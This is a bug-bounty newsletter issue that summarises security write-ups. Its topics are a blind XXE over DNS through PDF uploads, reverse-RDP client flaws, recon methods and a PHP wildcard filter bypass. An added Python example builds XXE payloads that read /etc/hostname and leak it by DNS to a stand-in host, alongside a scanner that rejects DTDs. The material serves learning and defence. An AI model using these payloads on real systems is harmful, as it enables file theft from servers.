The 5 Hacking NewsLetter 86
Posted in Newsletter on December 31, 2019
Posted in Newsletter on February 12, 2019
Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from February 1 to 8, 2019.
A $7.500 BUG Bounty Bug explained, step by step. (BLIND XXE OOB over DNS)
Another great video by @stokfredrik! It’s a writeup of a blind, out-of-band XXE over DNS, triggered through a PDF file upload.
Classic file upload payloads and attacks didn’t work, so the last thing @stokfredrik tried was smuggling XML entities inside PDF files. That produced a DNS lookup from the target server (observed with Burp Collaborator), the only sign that the XML was being parsed at all. Starting from that single signal, he escalated over several stages until he had a working blind XXE.
This is pretty advanced stuff but every stage is detailed and well explained, including tools and references.
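The two pieces a blind OOB-over-DNS XXE is built from, and the pre-parse check an upload handler should run, as an added example that is not from the video or the newsletter. Assumed for the demo (not stated in the source): the XML that gets parsed is the PDF's XMP metadata stream, "collab.example" stands in for a Burp Collaborator host, and the PDF bytes are constructed rather than a real file.

```python
"""Added example (not from the video or the newsletter): the two pieces a blind,
out-of-band XXE over DNS is built from, and the check an upload handler should
run before any XML embedded in a PDF reaches a parser.

Assumed for the demo (not stated in the source): the parsed XML is the PDF's
XMP metadata stream, and 'collab.example' stands in for a Burp Collaborator
host.  The PDF bytes below are constructed, not a real file."""
import re
import xml.etree.ElementTree as ET

COLLAB = "collab.example"   # placeholder for the attacker-controlled domain


def build_inline_doctype(collab: str) -> str:
    """Stage 1: the XML planted in the upload.  Its DOCTYPE loads a parameter
    entity from the attacker's host.  A parser that tries to resolve it must
    first look up that hostname, and the DNS query arriving at Collaborator is
    the blind signal the writeup starts from."""
    return (
        f'<!DOCTYPE x [ <!ENTITY % dtd SYSTEM "http://{collab}/x.dtd"> %dtd; ]>'
        "<x>&send;</x>"
    )


def build_hosted_dtd(collab: str, path: str = "/etc/hostname") -> str:
    """Stage 2: the DTD served from the attacker's host.  %file reads a local
    file, %eval declares an entity whose URL embeds that content as a DNS
    label, so the data leaves as a name lookup for <content>.collab.example."""
    return (
        f'<!ENTITY % file SYSTEM "file://{path}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM \'http://%file;.{collab}/\'>">\n'
        "%eval;\n"
    )


# --- defender side --------------------------------------------------------
DTD_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)
XMP_PACKET = re.compile(rb"<\?xpacket begin=.*?<\?xpacket end=[^>]*\?>", re.DOTALL)


def embedded_xml(pdf_bytes: bytes) -> list:
    """Every XMP packet in an uncompressed PDF (compressed streams need inflating first)."""
    return XMP_PACKET.findall(pdf_bytes)


def has_dtd(xml_bytes: bytes) -> bool:
    return DTD_MARKERS.search(xml_bytes) is not None


def safe_parse(xml_bytes: bytes) -> ET.Element:
    """Refuse any document that declares a DTD, then parse with ElementTree.
    No DTD means no external or parameter entities and no expansion bombs."""
    if has_dtd(xml_bytes):
        raise ValueError("DTD/entity declaration in uploaded XML rejected")
    return ET.fromstring(xml_bytes)


def scan_pdf(pdf_bytes: bytes) -> tuple:
    """('rejected' | 'ok', number of XML packets found) for one upload."""
    packets = embedded_xml(pdf_bytes)
    if any(has_dtd(p) for p in packets):
        return "rejected", len(packets)
    return "ok", len(packets)


# --- constructed sample input ---------------------------------------------
def wrap_in_pdf(xmp: str) -> bytes:
    """Minimal PDF skeleton with one uncompressed /Metadata stream (constructed)."""
    body = xmp.encode()
    return (b"%PDF-1.4\n1 0 obj\n<< /Type /Metadata /Subtype /XML /Length "
            + str(len(body)).encode() + b" >>\nstream\n" + body
            + b"\nendstream\nendobj\n%%EOF\n")


BENIGN_XMP = ('<?xpacket begin="" id="W5M0"?>'
              '<x:xmpmeta xmlns:x="adobe:ns:meta/"><dc:title '
              'xmlns:dc="http://purl.org/dc/elements/1.1/">report</dc:title>'
              '</x:xmpmeta><?xpacket end="w"?>')
MALICIOUS_XMP = ('<?xpacket begin="" id="W5M0"?>' + build_inline_doctype(COLLAB)
                 + '<?xpacket end="w"?>')

if __name__ == "__main__":
    print("attacker-hosted x.dtd:\n" + build_hosted_dtd(COLLAB))
    for label, pdf in (("benign", wrap_in_pdf(BENIGN_XMP)), ("xxe", wrap_in_pdf(MALICIOUS_XMP))):
        print(label, scan_pdf(pdf))
```

Two practical notes: the DNS lookup is usually made by the target's resolver rather than the target itself, so Collaborator shows the lookup even when outbound HTTP is blocked, which is exactly why DNS is the first signal to look for; and on the defensive side, rejecting DOCTYPE before the document ever reaches a parser is simpler and more robust than tuning parser features, since real PDFs' XMP metadata never needs a DTD.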
Check Point researchers tested three RDP clients: rdesktop, FreeRDP and Mstsc.exe (Microsoft’s built-in RDP client), and found 25 security vulnerabilities in total.
This made the news on general infosec sites because two of the clients tested are vulnerable to “reverse RDP” attacks: instead of the client attacking the server, a malicious RDP server exploits bugs in the connecting client. The bugs found allow such a server to get remote code execution on the client machine…
It’s the Little Things II: Exploiting Vulnerabilities Through Proper Reconnaissance
This is a nice addition to existing public recon methodologies. It touches a little bit of everything: asset discovery, OSINT, content discovery, and more. It’s worth reading and merging with your own current methodology.
Also, I’m not sure these are the right talks accompanying the slides, but they should at least give you some context around them:
Imagine you want to test a list of targets from your previous bugbounty notes for one specific test, a new endpoint, an XSS payload, a search for a hidden file/directory (like .git)… What would you use?
Tools like Burp Intruder send many requests to a single target. Inception does the opposite: it runs the same test against a whole list of targets.
It’s inspired by Snallygaster but includes more tests, is fast (it’s written in Go), and is highly customizable (new tests can be added without writing code).
The author of this blog post, a professional pentester, shares some tidbits on his pentesting methodology and custom tools.
The most interesting part is his framework “recron”, an “automated continuous recon framework”. He hasn’t released it, but his explanations might give you new ideas for improving your own automated bug hunting tooling.
He also shared Scanomaly, a web application fuzzer/scanner that is part of that framework.
Bypass filters using < (less-than sign). On Windows only, a string consisting of two “less-than” signs passed to PHP’s file_get_contents function is treated as an asterisk, i.e. as a wildcard, which can get past filters that block the asterisk itself.
See more writeups on The list of bug bounty writeups.
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 02/01/2019 to 02/08/2019
Have a nice week folks!
If you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…